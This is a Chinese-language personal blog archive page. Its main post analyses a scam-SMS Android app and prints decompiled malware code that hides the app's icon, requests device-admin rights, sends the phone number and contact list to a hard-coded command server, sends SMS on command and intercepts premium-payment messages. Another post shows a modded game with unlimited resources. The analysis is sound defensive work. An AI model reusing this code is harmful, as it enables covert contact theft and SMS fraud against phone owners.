Feeds:
文章
迴響

Archive for 2014 年 06 月

Google Play 官方下載

好久沒沈迷一個遊戲, 這個遊戲雖然玩法簡單但還蠻有趣的. 不過說實在還蠻有難度, 尤其是遇到具有"閃躲"技能的豬. 根本是消耗戰

不果動點手腳之後… 勢如破竹

取得寶劍

Screenshot_2014-06-20-05-27-49 Screenshot_2014-06-20-05-27-53 Screenshot_2014-06-20-06-33-00 Screenshot_2014-06-20-06-34-10

 

 

最終魔王

Screenshot_2014-06-20-05-16-14

 

Screenshot_2014-06-20-07-18-09

 

Screenshot_2014-06-20-07-18-33 Screenshot_2014-06-20-07-18-47 Screenshot_2014-06-20-07-18-58 Screenshot_2014-06-20-05-16-59

Screenshot_2014-06-20-07-19-05

 

等待遊戲新進度

20140624-08


 

補充:

1) 金錢/資源修改版

只對於重頭玩用戶有效…

2) 我的攻擊/防禦強化 + 敵人弱化版 + 資源無限

device-2014-06-20-222446

device-2014-06-20-222922

20140624-02 20140624-03 20140624-04 20140624-05 20140624-06 20140624-0720140624-01

 

 

Read Full Post »

解析 詐騙簡訊App

最近我也常收到 “民事賠償訴訟通知單(台北地院)“詐騙簡訊

20140608

好奇這些App的運作原理。首先

1. 點了簡訊的轉網址是連到 dropbox 的 apk

照理說手機點了應該也不會直接下載才對… 就算下載了應該也不會自動安裝

就算安裝也會顯示奇怪的權限….發送簡訊 <– 有這種權限的 App 基本上都要小心

為什麼會中標了呢?

 

20140608-01

2. 反編譯程式碼, 看有什麼好玩的

https://github.com/cwchiu/sms_virus/

a) 權限 – AndroidManifest.xml

android.permission.READ_PHONE_STATE
android.permission.SEND_SMS
android.permission.READ_SMS
android.permission.WRITE_SMS
android.permission.RECEIVE_SMS
android.permission.INTERNET
android.permission.READ_CONTACTS
android.permission.RECEIVE_BOOT_COMPLETED

基本上簡訊已經完全被掌握了….

聯絡人也被抓走,意思是你的朋友也可能收到你寄的詐騙簡訊

聯絡人也會被透過網路取走

最後他也會隨著Android 系統啟動時,自動在背景運作…

b) Activity 進入點 com.example.google.service.MainActivity

b.1) 啟動 com.example.google.service.Services 服務

 private void StartService()
  {
    Intent localIntent = new Intent();
    localIntent.setAction(“com.example.google.service.Services");
    getApplicationContext().startService(localIntent);
  }

b.2) 取得設備管理員權限

private void addAdviceAdmin()
  {
    Intent localIntent = new Intent(android.app.action.ADD_DEVICE_ADMIN);
    localIntent.putExtra(android.app.extra.DEVICE_ADMIN, new ComponentName(“com.example.google.service", “com.example.google.service.MyDeviceAdminReceiver"));
    startActivity(localIntent);
  }

b.3) 隱藏 App Icon

private void HideIcon()
  {
    getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
    setResult(1);
  }

c) 服務, com.example.google.service.Services

c.1) 執行 Repeater.sendUpdateBroadcastRepeat(this);

c.2) Repeater::sendUpdateBroadcastRepeat, 利用 Alarm 服務定時執行 TaskRequest

public class Repeater
{
  public static void sendUpdateBroadcastRepeat(Context paramContext)
  {
    PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, TaskRequest.class), 0);
    long l = SystemClock.elapsedRealtime();
    ((AlarmManager)paramContext.getSystemService(“alarm")).setRepeating(2, l, 40000L, localPendingIntent);
  }
}

c.3) TaskRequest::onReceive, 取得手機號碼, Model, SDK 版號

    this._Context = paramContext;
    if (this._Phone == null)
    {
      this._Phone = Tools.getPhoneNumber(this._Context);
      this._Model = Build.MODEL;
      this._Model = (this._Model + “;" + Build.VERSION.SDK_INT);
    }
    this._Caller = new WebServiceCalling(paramContext);
    SendRequest();

c.4) TaskRequest::SendRequest,

this._Caller.Request(this.taskHandler, this._Phone, this._Model);

c.5) WebServiceCalling::Request(Handler paramHandler, String paramString1, String paramString2) — 後面再說這個 WebServiceCalling

// this.urlRoot
// 定義在 strings.xml 的 Url
callWSSub(paramHandler, 100, this.urlRoot + “SMSHandler1.ashx?t=request&p=" + Uri.encode(paramString1) + “&m=" + Uri.encode(paramString2));

c.6) HttpHelper::callWS(String paramString)

// 送個 HTTP GET
HttpGet localHttpGet = new HttpGet(paramString);
    try
    {
      HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);
      Object localObject = “";
      if (localHttpResponse.getStatusLine().getStatusCode() == 200)
      {
        String str = EntityUtils.toString(localHttpResponse.getEntity());
        localObject = str;
      }
      return localObject;
    }
    catch (Exception localException)
    {
    }
    return “";

c.7) TaskRequest::taskHandler::handleMessage

public void handleMessage(Message paramAnonymousMessage)
    {
      switch (paramAnonymousMessage.what)
      {
      case 3:
      default:
        return;
      case 100:
         // 送出手機號碼
         // http://141.105.65.113/sms/SMSHandler.ashx?t=s&p=手機號碼
        TaskRequest.this.ProcessTasks(paramAnonymousMessage);
        return;
      case 0:
        // 發送簡訊
        new SMSSender(TaskRequest.this._Context).SendSMS(paramAnonymousMessage);
        return;
      case 2:
      }
      // 撈光你的通訊錄
      // 使用 WebServiceCalling::SendContacts
      // http://141.105.65.113/sms/ SMSHandler1.ashx?t=c&p=手機號碼&n=通訊錄資料
      new Contacts(TaskRequest.this._Context).ForwardContacts();
    }
  };

 

d) WebServiceCalling class — 網路服務

// 
// http://141.105.65.113/sms/SMSHandler.ashx?t=c&p=xxx&n=yyy
  public void ForwardContacts(Handler paramHandler, String paramString1, String paramString2)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(this.urlRoot + “SMSHandler.ashx?t=c&p=" + Uri.encode(paramString1) + “&n=" + Uri.encode(paramString2));
  }
//
// http://141.105.65.113/sms/SMSHandler1.ashx?t=l&p=ppp&c=ccc&ty=ooo&l=uuu
  public void Log(String paramString1, String paramString2, String paramString3, String paramString4)
  {
    callWSSub(this.urlRoot + “SMSHandler1.ashx?t=l&p=" + Uri.encode(paramString3) + “&c=" + paramString1 + “&ty=" + paramString2 + “&l=" + Uri.encode(paramString4));
  }
//http://141.105.65.113/sms/SMSHandler1.ashx?t=new
  public void NEWURL()
  {
    String str = this.urlRoot + “SMSHandler1.ashx?t=new";
    System.out.print(str);
    callWSSub(this.Handler_NewUrl, str);
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=request&p=xxxx&m=yyy
  public void Request(Handler paramHandler, String paramString1, String paramString2)
  {
    callWSSub(paramHandler, 100, this.urlRoot + “SMSHandler1.ashx?t=request&p=" + Uri.encode(paramString1) + “&m=" + Uri.encode(paramString2));
  }
// http://141.105.65.113/sms/SMSHandler.ashx?t=s&p=xxx 
  public void Send(Handler paramHandler, String paramString)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(paramHandler, 0, this.urlRoot + “SMSHandler.ashx?t=s&p=" + Uri.encode(paramString));
  }
// http://141.105.65.113/sms/SMSHandler1.ashx?t=c&p=xxx&n=yyy
  public void SendContacts(String paramString1, String paramString2)
  {
    callWSSub(this.urlRoot + “SMSHandler1.ashx?t=c&p=" + Uri.encode(paramString1) + “&n=" + Uri.encode(paramString2));
  }
// http://141.105.65.113/sms/SMSHandler.ashx?t=stc&p=xxx
  public void SendToContacts(Handler paramHandler, String paramString)
    throws ParserConfigurationException, UnsupportedEncodingException
  {
    callWSSub(paramHandler, 3, this.urlRoot + “SMSHandler.ashx?t=stc&p=" + Uri.encode(paramString));
  }

e) SMSReceiver — 簡訊攔截處理

e.1) 檢驗是否為特殊號碼 6279,1232111,mopay,boku,66245,bezahlcode,holyo,55498,55496,33235,46645

e.2) 執行 WebServiceCalling::Forward

 

Read Full Post »

[AngularJS] 簡單測試

之前看書上介紹 Backbone, 後來陰錯陽差跳到 Angular 發現雙向繫結、相依注入真是太有趣啦… 寫了簡單的測試程式

線上玩  http://jsbin.com/lokuj/3/

 

20140601-01

Read Full Post »